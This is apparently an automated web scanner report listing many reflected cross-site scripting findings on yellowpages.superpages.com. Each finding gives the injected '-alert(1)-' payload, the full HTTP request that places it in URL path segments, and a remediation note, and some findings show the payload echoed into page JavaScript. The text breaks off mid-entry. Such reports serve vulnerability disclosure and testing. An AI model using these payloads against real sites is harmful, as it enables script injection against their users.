Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
